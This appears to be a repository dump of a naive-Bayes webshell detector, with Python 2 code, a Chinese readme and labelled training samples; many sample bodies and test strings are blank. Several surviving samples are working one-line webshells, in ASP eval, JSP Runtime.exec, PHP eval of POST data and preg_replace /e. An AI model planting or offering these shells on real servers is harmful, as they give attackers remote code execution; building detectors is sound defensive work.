├── machine_learning_model.py
├── pic
├── sample_test.png
├── test.png
└── vector.png
├── readme.md
└── shell
├── normal-asp-code-0.asp
├── normal-jsp-code-0.jsp
├── normal-php-code-0.php
├── normal-php-code-1.php
├── normal-php-code-2.php
├── normal-php-code-3.php
├── shell-asp-eval-0.asp
├── shell-jsp-command-0.jsp
├── shell-php-assert-0.php
├── shell-php-assert-1.php
├── shell-php-assert-2.php
├── shell-php-assert-3.php
├── shell-php-assert-4.php
├── shell-php-call_user_func-0.php
├── shell-php-copy-0.php
├── shell-php-create_function-0.php
├── shell-php-create_function-1.php
├── shell-php-create_function-2.php
├── shell-php-create_function-3.php
├── shell-php-eval-0.php
├── shell-php-eval-1.php
├── shell-php-eval-2.php
├── shell-php-eval-3.php
├── shell-php-eval-4.php
├── shell-php-eval-5.php
├── shell-php-eval-6.php
├── shell-php-fwrite-0.php
├── shell-php-include-0.php
├── shell-php-include-1.php
├── shell-php-include-5.php
├── shell-php-popen-0.php
├── shell-php-preg_replace-0.php
├── shell-php-preg_replace-1.php
├── shell-php-preg_replace-2.php
├── shell-php-require-0.php
├── shell-php-require-4.php
└── shell-php-system-0.php
/machine_learning_model.py:
--------------------------------------------------------------------------------
1 |
2 | import math
3 | import os
4 | import sys
5 |
6 |
7 | class shell_detect :
8 |
9 | @staticmethod
10 | def read_file(file_path) :
11 | file = open(file_path)
12 | data = file.read()
13 |
14 | file.close()
15 |
16 | return data
17 |
18 | @staticmethod
19 | def code_word_to_vector(php_code) :
20 | filter_flag_list = ['@','[',']','(',')','{','}','\'','"',',',';','=','.','\t','\n','\r\n']
21 | keyword = ['$_GET','$_POST','$_REQUEST','$_COOKIE']
22 |
23 | for filter_flag_index in filter_flag_list :
24 | php_code = php_code.replace(filter_flag_index,' ')
25 |
26 | vector = php_code.split(' ')
27 |
28 | for index in range(len(vector)) : # filter $ variant
29 | if vector[index].startswith('$') and not vector[index] in keyword :
30 | vector[index] = ''
31 | elif vector[index] in keyword :
32 | vector[index] = '$'
33 |
34 | while vector.count('') : # filter empty item ..
35 | vector.remove('')
36 |
37 | return vector
38 |
39 | @staticmethod
40 | def load_and_train_model(data_set_path = 'shell') :
41 | file_list = os.listdir(data_set_path)
42 | shell_sample = {} # classfy set ..
43 |
44 | for file_index in file_list :
45 | try :
46 | file_information = file_index.split('-')
47 | classfy_type = file_information[0] + '-' + file_information[1] + '-' + file_information[2]
48 | php_code_vector = shell_detect.code_word_to_vector(shell_detect.read_file(data_set_path + '\\' + file_index))
49 |
50 | if not shell_sample.has_key(classfy_type) :
51 | shell_sample[classfy_type] = []
52 |
53 | shell_sample[classfy_type].append(php_code_vector)
54 | except :
55 | print 'Error Shell Sample File !' , file_index
56 | print 'Sample File Name Format :'
57 | print ' normal-%shell_language%-%shell_type%-%shell_index%.php or '
58 | print ' shell-%shell_language%-%shell_type%-%shell_index%.php '
59 |
60 | return shell_sample
61 |
62 | def __init__(self,data_set_path = 'shell') :
63 | self.shell_sample = shell_detect.load_and_train_model(data_set_path)
64 |
65 | def try_classify(self,php_code) :
66 | php_code_vector = shell_detect.code_word_to_vector(php_code)
67 | alpha = 1
68 | p_list = {}
69 |
70 | #print 'Debug for try_classify : ' ,php_code_vector
71 |
72 | for key_index in self.shell_sample.keys() :
73 | max_p_value = 0
74 |
75 | for shell_sample_index in self.shell_sample[key_index] :
76 | found_vector_in_shell_sample_count = 0
77 |
78 | for php_code_vector_index in php_code_vector :
79 | if php_code_vector_index in shell_sample_index :
80 | found_vector_in_shell_sample_count += shell_sample_index.count(php_code_vector_index)
81 |
82 | p_value = (found_vector_in_shell_sample_count + alpha) / float(len(shell_sample_index) * 2 + alpha)
83 |
84 | #print shell_sample_index , p_value
85 |
86 | if p_value >= max_p_value :
87 | max_p_value = p_value
88 |
89 | p_list[key_index] = max_p_value
90 |
91 | #print key_index ,p_list[key_index]
92 |
93 | max_p_value = 0
94 | max_p_type_name = ''
95 |
96 | for p_type_name_index in p_list.keys() :
97 | p_value = p_list[p_type_name_index]
98 |
99 | if p_value >= max_p_value :
100 | max_p_value = p_value
101 | max_p_type_name = p_type_name_index
102 |
103 | #print php_code , max_p_type_name , max_p_value
104 |
105 | return max_p_type_name
106 |
107 |
108 | if __name__ == '__main__' :
109 | model = shell_detect()
110 |
111 | if 2 == len(sys.argv) :
112 | print 'Shell Type :' , model.try_classify(shell_detect.read_file(sys.argv[1]))
113 | else :
114 | print 'Test Sample ..'
115 | print 'Shell Type :' , model.try_classify('')
116 | print 'Shell Type :' , model.try_classify('')
117 | print 'Shell Type :' , model.try_classify('')
118 | print 'Shell Type :' , model.try_classify('')
119 | print 'Shell Type :' , model.try_classify('')
120 | print 'Shell Type :' , model.try_classify('')
121 | print 'Shell Type :' , model.try_classify('')
122 | print 'Shell Type :' , model.try_classify('')
123 | print 'Shell Type :' , model.try_classify('')
124 | print 'Shell Type :' , model.try_classify('')
--------------------------------------------------------------------------------
/pic/sample_test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lcatro/WebShell-Detect-By-Machine-Learning/94efa9a8d600f965f2d166721249c6a32b8ce17f/pic/sample_test.png
--------------------------------------------------------------------------------
/pic/test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lcatro/WebShell-Detect-By-Machine-Learning/94efa9a8d600f965f2d166721249c6a32b8ce17f/pic/test.png
--------------------------------------------------------------------------------
/pic/vector.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lcatro/WebShell-Detect-By-Machine-Learning/94efa9a8d600f965f2d166721249c6a32b8ce17f/pic/vector.png
--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 |
2 | ## 使用机器学习识别WebShell
3 |
4 | 学习样本在**shell** 目录,目前样本较少,疏漏之处在所难免,测试结果如下:
5 |
6 | 
7 |
8 | ## 实现原理
9 |
10 | 实现原理是使用朴素贝叶斯进行文本分类.分类的样本包含正常的代码与WebShell 代码,为了方便后面的阅读,可以先阅读下面两个链接:
11 |
12 | [朴素贝叶斯原理](http://blog.csdn.net/u012162613/article/details/48323777)
13 | [朴素贝叶斯分类文本](http://www.cnblogs.com/XBWer/archive/2014/07/13/3840736.html)
14 |
15 | 站在朴素贝叶斯算法来看,代码其实就是一串文本,我们要做的第一件事就是要对文本进行处理,变成算法可以处理的形式
16 |
17 | ```python
18 |
19 | def code_word_to_vector(php_code) :
20 | filter_flag_list = ['@','[',']','(',')','{','}','\'','"',',',';','=','.','\t','\n','\r\n']
21 | keyword = ['$_GET','$_POST','$_REQUEST','$_COOKIE']
22 |
23 | for filter_flag_index in filter_flag_list :
24 | php_code = php_code.replace(filter_flag_index,' ')
25 |
26 | vector = php_code.split(' ')
27 |
28 | for index in range(len(vector)) : # filter $ variant
29 | if vector[index].startswith('$') and not vector[index] in keyword :
30 | vector[index] = ''
31 | elif vector[index] in keyword :
32 | vector[index] = '$'
33 |
34 | while vector.count('') : # filter empty item ..
35 | vector.remove('')
36 |
37 | return vector
38 |
39 | ```
40 |
41 | 预处理代码的算法做下面的工作:
42 |
43 | 1.`filter_flag_list` 只的是即将要过滤掉的字符,把它们替换成空格;`keyword` 的意思是,只保留这些关键的全局变量,那些无用的变量全部去除掉,否则变量名的文本在样本中和被检测的代码中也出现的话会影响概率计算结果
44 | 2.以空格字符作为分隔符,分割出所有的文本
45 | 3.过滤PHP 变量,只允许全局变量($_GET ,$_POST ,$_REQUEST ,$_COOKIE )的出现
46 | 4.从已经处理好的文本列表里面去除空内容(这里受到空格分隔符的影响,会有很多这样的空白内容)
47 |
48 | 代码处理后的效果
49 |
50 | 
51 |
52 | 处理完成代码之后,下一步就是加载数据集,来看看代码
53 |
54 | ```python
55 |
56 | def load_and_train_model(data_set_path = 'shell') :
57 | file_list = os.listdir(data_set_path)
58 | shell_sample = {} # classfy set ..
59 |
60 | for file_index in file_list :
61 | try :
62 | file_information = file_index.split('-')
63 | classfy_type = file_information[0] + '-' + file_information[1] + '-' + file_information[2]
64 | php_code_vector = shell_detect.code_word_to_vector(shell_detect.read_file(data_set_path + '\\' + file_index))
65 |
66 | if not shell_sample.has_key(classfy_type) :
67 | shell_sample[classfy_type] = []
68 |
69 | shell_sample[classfy_type].append(php_code_vector)
70 | except :
71 | print 'Error Shell Sample File !' , file_index
72 | print 'Sample File Name Format :'
73 | print ' normal-%shell_language%-%shell_type%-%shell_index%.php or '
74 | print ' shell-%shell_language%-%shell_type%-%shell_index%.php '
75 |
76 | return shell_sample
77 |
78 | ```
79 |
80 | 加载数据集的代码主要做下面的工作:
81 |
82 | 1.根据指定的样本目录来读取训练的样本数据
83 | 2.样本数据文件的命名中包含了正常的代码和WebShell 的类型,命名规则为:**样本类型-语言-代码类型-序号.拓展名**,命名为normal-php-code-0.php 的文件的意思是这个样本文件是正常的PHP 代码文件,最后的0 代表着样本文件序号;命名为shell-php-eval-0.php 的意思是PHP 的eval() 函数的WebShell 样本文件
84 | 3.把这些样本文件读取出来预处理一下再放到样本集中
85 |
86 | 样本数据加载完成之后,接下来就是要对我们需要检测的文件做一个分类,思路是判断检测文件在各个样本中出现的概率,找到最大概率的那个就是对应的代码类别
87 |
88 | ```python
89 |
90 | def try_classify(self,php_code) :
91 | php_code_vector = shell_detect.code_word_to_vector(php_code)
92 | alpha = 1
93 | p_list = {}
94 |
95 | for key_index in self.shell_sample.keys() :
96 | max_p_value = 0
97 |
98 | for shell_sample_index in self.shell_sample[key_index] :
99 | found_vector_in_shell_sample_count = 0
100 |
101 | for php_code_vector_index in php_code_vector :
102 | if php_code_vector_index in shell_sample_index :
103 | found_vector_in_shell_sample_count += shell_sample_index.count(php_code_vector_index)
104 |
105 | p_value = (found_vector_in_shell_sample_count + alpha) / float(len(shell_sample_index) * 2 + alpha)
106 |
107 | if p_value >= max_p_value :
108 | max_p_value = p_value
109 |
110 | p_list[key_index] = max_p_value
111 |
112 | max_p_value = 0
113 | max_p_type_name = ''
114 |
115 | for p_type_name_index in p_list.keys() :
116 | p_value = p_list[p_type_name_index]
117 |
118 | if p_value >= max_p_value :
119 | max_p_value = p_value
120 | max_p_type_name = p_type_name_index
121 |
122 | return max_p_type_name
123 |
124 | ```
125 |
126 | 分类函数的逻辑如下:
127 |
128 | 1.对要检测的代码进行预处理
129 | 2.遍历所有的样本文件,使用朴素贝叶斯算法对所有的样本进行概率计算
130 | 3.找到概率最大的那个样本的类别
131 | 4.返回最后分类的结果
132 |
133 | 代码处理与分类算法已经介绍完,样本也是重要的一部分,接下来我们来看一下样本的构造
134 |
135 | ```php
136 |
137 | // shell-php-eval-0.php
138 |
139 |
144 |
145 |
146 | // shell-php-eval-4.php
147 |
148 |
149 |
150 |
151 | // shell-php-create_function-3.php
152 |
153 |
160 |
161 |
162 | // shell-php-assert-1.php
163 |
164 |
165 |
166 |
167 | // shell-php-preg_replace-1.php
168 |
169 |
175 |
176 |
177 | // normal-php-code-0.php
178 |
179 |
184 |
185 |
186 | // normal-php-code-2.php
187 |
188 |
196 |
197 | ```
198 |
199 | 样本的构造基本上是使用已知的WebShell 并且做一个归类.正常的代码这里只使用一些简单的PHP 语句,如果没有正常的代码,会导致概率的判断全部都会归类到WebShell 代码的范畴.
200 |
201 | 测试样本
202 |
203 | ```python
204 |
205 | print 'Shell Type :' , model.try_classify('')
206 | print 'Shell Type :' , model.try_classify('')
207 | print 'Shell Type :' , model.try_classify('')
208 | print 'Shell Type :' , model.try_classify('')
209 | print 'Shell Type :' , model.try_classify('')
210 | print 'Shell Type :' , model.try_classify('')
211 | print 'Shell Type :' , model.try_classify('')
212 | print 'Shell Type :' , model.try_classify('')
213 | print 'Shell Type :' , model.try_classify('')
214 | print 'Shell Type :' , model.try_classify('')
215 |
216 | ```
217 |
218 | 测试结果
219 |
220 | 
221 |
222 |
--------------------------------------------------------------------------------
/shell/normal-asp-code-0.asp:
--------------------------------------------------------------------------------
1 |
2 | <%
3 |
4 | dim $a
5 |
6 | $a = 0
7 |
8 | %>
--------------------------------------------------------------------------------
/shell/normal-jsp-code-0.jsp:
--------------------------------------------------------------------------------
1 |
2 | <%
3 |
4 | int $i = 0;
5 |
6 | %>
7 |
--------------------------------------------------------------------------------
/shell/normal-php-code-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
--------------------------------------------------------------------------------
/shell/normal-php-code-1.php:
--------------------------------------------------------------------------------
1 |
2 |
10 |
--------------------------------------------------------------------------------
/shell/normal-php-code-2.php:
--------------------------------------------------------------------------------
1 |
2 |
10 |
--------------------------------------------------------------------------------
/shell/normal-php-code-3.php:
--------------------------------------------------------------------------------
1 |
2 |
12 |
--------------------------------------------------------------------------------
/shell/shell-asp-eval-0.asp:
--------------------------------------------------------------------------------
1 | <% eval request("chopper") %>
--------------------------------------------------------------------------------
/shell/shell-jsp-command-0.jsp:
--------------------------------------------------------------------------------
1 | <% Runtime.getRuntime().exec(request.getParameter("test")); %>
--------------------------------------------------------------------------------
/shell/shell-php-assert-0.php:
--------------------------------------------------------------------------------
1 |
2 |
6 |
--------------------------------------------------------------------------------
/shell/shell-php-assert-1.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-assert-2.php:
--------------------------------------------------------------------------------
1 |
2 |
5 |
--------------------------------------------------------------------------------
/shell/shell-php-assert-3.php:
--------------------------------------------------------------------------------
1 |
2 |
5 |
--------------------------------------------------------------------------------
/shell/shell-php-assert-4.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-call_user_func-0.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-copy-0.php:
--------------------------------------------------------------------------------
1 |
2 |
11 |
--------------------------------------------------------------------------------
/shell/shell-php-create_function-0.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-create_function-1.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-create_function-2.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-create_function-3.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-1.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-2.php:
--------------------------------------------------------------------------------
1 |
2 | $code = '';
3 | foreach($_POST as $a){
4 | $code = $a;
5 | break;
6 | }
7 | eval($code);
8 | ?>
--------------------------------------------------------------------------------
/shell/shell-php-eval-3.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-4.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-5.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-6.php:
--------------------------------------------------------------------------------
1 |
6 |
--------------------------------------------------------------------------------
/shell/shell-php-fwrite-0.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-include-0.php:
--------------------------------------------------------------------------------
1 |
2 | ');
5 |
6 | include 'code.php';
7 |
8 | ?>
9 |
--------------------------------------------------------------------------------
/shell/shell-php-include-1.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
--------------------------------------------------------------------------------
/shell/shell-php-include-5.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
--------------------------------------------------------------------------------
/shell/shell-php-popen-0.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-preg_replace-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
--------------------------------------------------------------------------------
/shell/shell-php-preg_replace-1.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-preg_replace-2.php:
--------------------------------------------------------------------------------
1 |
2 |
3 | @preg_replace("/f/e",$_GET['u'],"fengjiao");
4 |
5 | ?>
--------------------------------------------------------------------------------
/shell/shell-php-require-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
--------------------------------------------------------------------------------
/shell/shell-php-require-4.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
--------------------------------------------------------------------------------
/shell/shell-php-system-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
--------------------------------------------------------------------------------